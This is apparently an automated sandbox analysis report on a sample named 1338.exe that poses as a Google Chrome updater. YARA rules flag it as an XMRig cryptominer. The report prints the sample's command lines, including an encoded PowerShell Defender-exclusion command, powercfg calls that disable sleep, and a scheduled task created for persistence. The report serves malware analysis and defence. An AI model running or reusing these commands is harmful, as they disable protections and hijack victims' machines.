                                        Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1292
                                        Entropy (8bit):5.328578206529804
                                        Encrypted:false
                                        SSDEEP:24:3vRPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKuKnKJRSF8PQ9eF:pPerB4nqRL/Hvfe9t4Cv94aR48Y9eF
                                        MD5:8AF75C45817AC79514D6CC38A486B805
                                        SHA1:CED8C609967BA48826C01D45CECE111BB9797BCE
                                        SHA-256:9B93C0BEB81A37BD904ECDB52F7F83284E2BD49F7CBC3D387774F47CFD37CD74
                                        SHA-512:29587826FFB78B7D38B4D66B638A885AA100578FE487F660E718568A848FCBF238AC0642AEC0ADF4299FC2BCF1D152A84D789BD211A21FF2EF4632BD10332DD5
                                        Malicious:false
                                        Preview:@...e...........................................................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                        C:\Windows\Temp\__PSScriptPolicyTest_5xvkmjam.hyi.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Windows\Temp\__PSScriptPolicyTest_frzn2qj0.jw3.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        Static File Info

                                        General

                                        File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                        Entropy (8bit):7.999416157743483
                                        TrID:
                                        • Win64 Executable (generic) (12005/4) 74.80%
                                        • Generic Win/DOS Executable (2004/3) 12.49%
                                        • DOS Executable Generic (2002/1) 12.47%
                                        • VXD Driver (31/22) 0.19%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                        File name:1338.exe
                                        File size:1951744
                                        MD5:ac711e6653707f0b1d245ff40d95385f
                                        SHA1:279b9abaf000303983d6ecfb91e8b221b00fb198
                                        SHA256:909409814d725477622728168035c3f2d259b5d8aa1ca77403d8c259bd7aba63
                                        SHA512:d394116574e829bc30eebebc71adadb2894d00e7dc31f35eae0a67675c5fc093be660382f242a80dfacf5415175b1ffd5817bd408c82f5800e52ea5e4196326e
                                        SSDEEP:49152:bSq99dc5dgyd2j/audFlu5EWEKzCOg/t/XBbntjrXfNpTM:b59STNYjFF8EKLgVRbtjrXH
                                        TLSH:179533146EA9DF6DF84754787915621DACE9E8334B2890AF241466B10BF5CB303FE3E8
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........................@.....................................\......................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x401bea
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:7dbd2319b33ed25eb7ad7d0162c2bb3a

                                        Entrypoint Preview

                                        Instruction
                                        push ebp
                                        dec eax
                                        mov ebp, esp
                                        dec eax
                                        sub esp, 00000040h
                                        dec eax
                                        mov eax, 00000004h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        dec ecx
                                        mov eax, eax
                                        mov eax, 00000000h
                                        dec ecx
                                        mov ebx, eax
                                        dec eax
                                        lea eax, dword ptr [ebp-04h]
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        dec esp
                                        mov edx, ebx
                                        call 00007F2804F90C01h
                                        dec eax
                                        lea eax, dword ptr [FFFFFF98h]
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        call 00007F2804F90C1Fh
                                        mov eax, 00000001h
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        call 00007F2804F90C17h
                                        mov eax, 00030000h
                                        dec ecx
                                        mov ebx, eax
                                        mov eax, 00010000h
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        dec esp
                                        mov edx, ebx
                                        call 00007F2804F90C04h
                                        dec eax
                                        mov eax, dword ptr [001DAD1Ch]
                                        dec eax
                                        mov ecx, dword ptr [001DAD1Dh]
                                        dec eax
                                        mov edx, dword ptr [001DAD1Eh]
                                        dec eax
                                        mov dword ptr [ebp-10h], eax
                                        dec eax
                                        lea eax, dword ptr [ebp-04h]
                                        dec eax
                                        mov dword ptr [esp+20h], eax
                                        mov eax, dword ptr [001DC327h]
                                        dec ecx
                                        mov ecx, eax
                                        dec ecx
                                        mov eax, edx
                                        dec ecx
                                        mov ebx, ecx
                                        dec eax
                                        mov eax, dword ptr [ebp-10h]
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        dec esp
                                        mov edx, ebx
                                        call 00007F2804F90BC9h
                                        dec eax
                                        mov eax, dword ptr [001DACD9h]
                                        dec eax
                                        mov ecx, dword ptr [001DACDAh]
                                        dec eax
                                        mov edx, dword ptr [001DACDBh]

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1dc9200x3c.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1df0000x630.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1de0000x90.pdata
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x1dc95c0x90.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000xdd00xe00False0.436941964286data5.41840784885IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata0x20000x1dab6c0x1dac00False0.999571628982data7.99988164686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .bss0x1dd0000xfac0x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .pdata0x1de0000x900x200False0.171875data1.18650676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .rsrc0x1df0000x6300x800False0.34228515625data3.77340234116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_VERSION0x1df0a00x2f0SysEx File - IDPEnglishUnited States
                                        RT_MANIFEST0x1df3900x29fXML 1.0 document, ASCII textEnglishUnited States

                                        Imports

                                        DLLImport
                                        msvcrt.dllmalloc, memset, _get_pgmptr, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                        kernel32.dllSleep, GetWindowsDirectoryA, CreateProcessA, SetUnhandledExceptionFilter

                                        Version Infos

                                        DescriptionData
                                        LegalCopyrightCopyright 2017 Google Inc. All rights reserved.
                                        FileVersion70,0,3538,110
                                        CompanyNameGoogle Inc.
                                        ProductNameGoogle Chrome
                                        ProductVersion70,0,3538,110
                                        FileDescriptionGoogle Chrome
                                        FileTitleupdater.exe
                                        LegalTrademark
                                        Translation0x0409 0x04b0

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        No network behavior found

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:22:19:13
                                        Start date:24/05/2022
                                        Path:C:\Users\user\Desktop\1338.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\1338.exe"
                                        Imagebase:0x400000
                                        File size:1951744 bytes
                                        MD5 hash:AC711E6653707F0B1D245FF40D95385F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Target ID:1
                                        Start time:22:19:14
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\1338.exe
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Target ID:2
                                        Start time:22:19:16
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:3
                                        Start time:22:19:16
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:4
                                        Start time:22:19:17
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                                        Imagebase:0x7ff619710000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Target ID:9
                                        Start time:22:19:39
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:10
                                        Start time:22:19:40
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:11
                                        Start time:22:19:41
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Target ID:12
                                        Start time:22:19:41
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Target ID:13
                                        Start time:22:19:42
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:14
                                        Start time:22:19:42
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -standby-timeout-ac 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:15
                                        Start time:22:19:42
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:16
                                        Start time:22:19:43
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -standby-timeout-dc 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:17
                                        Start time:22:19:43
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"'
                                        Imagebase:0x7ff79c0d0000
                                        File size:226816 bytes
                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:19
                                        Start time:22:19:53
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:21
                                        Start time:22:19:53
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:22
                                        Start time:22:19:54
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff79c0d0000
                                        File size:226816 bytes
                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:23
                                        Start time:22:19:54
                                        Start date:24/05/2022
                                        Path:C:\Program Files\Google\Chrome\updater.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Program Files\Google\Chrome\updater.exe
                                        Imagebase:0x400000
                                        File size:1951744 bytes
                                        MD5 hash:AC711E6653707F0B1D245FF40D95385F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 68%, Virustotal, Browse
                                        • Detection: 33%, Metadefender, Browse
                                        • Detection: 73%, ReversingLabs

                                        General

                                        Target ID:24
                                        Start time:22:19:56
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                        General

                                        Target ID:25
                                        Start time:22:19:58
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:26
                                        Start time:22:19:59
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:27
                                        Start time:22:20:00
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                                        Imagebase:0x7ff619710000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        General

                                        Target ID:32
                                        Start time:22:20:43
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:33
                                        Start time:22:20:43
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:34
                                        Start time:22:20:44
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:36
                                        Start time:22:20:45
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:37
                                        Start time:22:20:49
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\conhost.exe
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:38
                                        Start time:22:20:49
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -standby-timeout-ac 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:39
                                        Start time:22:20:50
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -standby-timeout-dc 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:41
                                        Start time:22:20:52
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\conhost.exe" "ossgiopsxz
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:35.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:15
                                          Total number of Limit Nodes:0
                                          execution_graph 220 401ce2 _controlfp 221 4010c4 2 API calls 220->221 222 401d63 221->222 206 401bea 207 401c1c 206->207 210 401b3f 207->210 209 401cd5 211 401b75 210->211 214 4010c4 211->214 213 401bae 213->209 215 401d70 214->215 216 4010e7 memset 215->216 217 40114a 216->217 218 4011f1 sprintf 217->218 219 40129a 218->219 219->213

                                          Callgraph

                                          Executed Functions

                                          Function 004010C4 Relevance: 2.7, APIs: 2, Instructions: 175COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 31%
                                          			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				void* _v32;
				char _v136;
				void* _v144;
				char _v152;
				char _v160;
